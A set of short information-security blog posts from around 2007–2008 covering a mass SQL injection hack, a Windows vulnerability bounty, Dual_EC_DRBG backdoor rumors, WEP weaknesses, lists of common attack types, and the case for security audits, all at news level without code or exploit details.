Late in December 2007, something Roger Thompson of Grisoft characterized as “a pretty good mass hack” compromised tens of thousands of websites, including edu and gov domains, with an automated SQL injection. The hack exploited a Microsoft SQL Server vulnerability that was over a year old, one that was patched in early 2006 by the MS06-014 security update. The hack injected into SQL databases an SQL iterative loop with a JavaScript tag that appends itself to every column of text. The script instructs browsers reaching the site to execute another script hosted on a malicious server. From what is known, those hacked appeared to share little in common except a common weak spot in their SQL server databases. Since those hacked are not bragging about it, the identities of the hackers as well as the actual purpose of the hackers was, and is, unclear.

Although the mass hack was cleaned up in record time, quickly relieving many fears of disastrous consequences, the possibilities from the hack may have been broader than what actually took place. One professional web developer responding on Thompson’s blog anxiously noted, “Looks like exploits for Y! Messenger, IE TIFF overflow and RealPlayer are also in there. Yikes.” Symantec and other experts analyzing the JavaScript itself agreed that the malicious script targeted a RealPlayer bug, one much more recent that the server vulnerability. The RealPlayer bug targeted had been found and fixed in October 2007, only a couple of months before the hack.

Those hacked were not simply at-home users or amateur server owners. According to Thompson, who reported the hack on January 5, 2008, “some victims were pretty sophisticated in terms of security smarts, including, apparently, some Computer Associates pages.” While it appears that no seriously harmful damage resulted from this particular hack, its massive size leaves many users troubled about other equally vulnerable bugs that may exist in their own server farms.

Tags: Events, Information Security, Security Breach, Web Defacement

Author: Christopher

Digital Armaments is running a “Hacker Challenge” to uncover exploitable vulnerabilities in Microsoft Windows operating system.  $20,000 is being offered on top of their normal offer for a windows vulnerability or exploit.  Digital Armaments then sells this information to anyone who wants to subscribe to their vulnerability intelligence subscription ranging from $6,000 to $80,000 a year.

Tags: Exploit, Information Security, Vulnerability

Author: Christopher

According to Microsoft’s own MSDN (Microsoft Developer Network) site Dual_EC_DRBG random number generator is being added to the future release of Vista Service Pack 1 and their new server OS Windows Server 2008. The reason this is a significant newsworthy point of fact is because there are many rumors there is a back door to this random number generator. A majority of the rumors point to the NSA having the keys to this back door. Encryption based off a random number generator that has been compromised is only a little better than clear text.

A presentation from a few research developers at Microsoft provides some insight on the math, but reading it requires a masters in advanced mathematics.

Tags: Information Security, Vista

Author: Christopher

41% of the wireless installations used in business implement WEP (Wired Equivalent Privacy) Wi-Fi security. The largest data breach in the United States is contributed directly to a flaw in WEP security, resulting in the compromise of 94 million payment card numbers.

Vivek Ramachandran of AirTight Networks recently presented a technique to hack WEP in about the time it takes to finish a cup of coffee. Unfortunately this is one of many documented attacks to the WEP security protocol.

If your business still uses WEP security it is only a matter of time your network will be breached and that your data and intellectual property will be compromised.

WPA (Wi-Fi Protected Access) is considered best practice for wireless security, WPA 2 being even better.  If you haven’t already, I highly suggest you upgrade.

Tags: Information Security

Author: Christopher

Top 5 attacks used by U.S. hackers

1. Internet Explorer 6 Buffer Overflow
2. Generic File Inclusion
3. Mambo register_globals Emulation Layer Overwrite
4. Microsoft Windows COM Object Handling Vulnerability
5. Internet Explorer HTML Help Remote Code Execution

Top 5 Attacks used by Foreign hackers

1. HTTP overflow attack
2. Generic File Inclusion
3. WebDAV Overflow Attempt
4. Mambo register_globals Emulation Layer Overwrite
5. phpBB Activity Module File Inclusion

Tags: CyberCrime, hackers, Information Security

Author: Christopher

It’s a shocking but true statement.

But then if the vulnerabilities and misconfigurations are known, why are steps not taken to correct them?

Well, the answer lies in the question itself. The vulnerabilities are known but which ones exist in your system’s network need to be identified.  The first step towards protection against security breaches is identification of these vulnerabilities. This is achieved through security audits and vulnerability scans.

A number of people question the need for security audits and few people even dismiss them as unnecessary. Some people believe that their anti-virus software can take care of all such security concerns. And it’s astonishing to know that a lot of people either have obsolete anti-viruses that are not updated as frequently as they should be or their anti-virus software has poor virus detection rate.

The need for protection varies from business to business. Though a powerful anti-virus software might suffice one business’ security needs; other businesses might require a more sophisticated security solution that comprises protection against malware of all types (malware is the short for “malicious software” and includes viruses, Trojans, worms, spyware, and adware).

Security audits involve a thorough analysis of the systems/network and security practices in order to determine the security solution that would best suit the organization. Security audits involve a lot of tests to identify misconfigurations, firewall vulnerability (e.g. due to exposed workstations), password policy, suitability of current anti-virus software, network component (modems, dial pools etc) vulnerability, vulnerability of web services, mail databases, etc. You must ensure that your security auditors perform all the relevant security tests and give you a complete and comprehensive security solution

Tags: Information Security, Security Breach, Web Vulnerability

Author: Christopher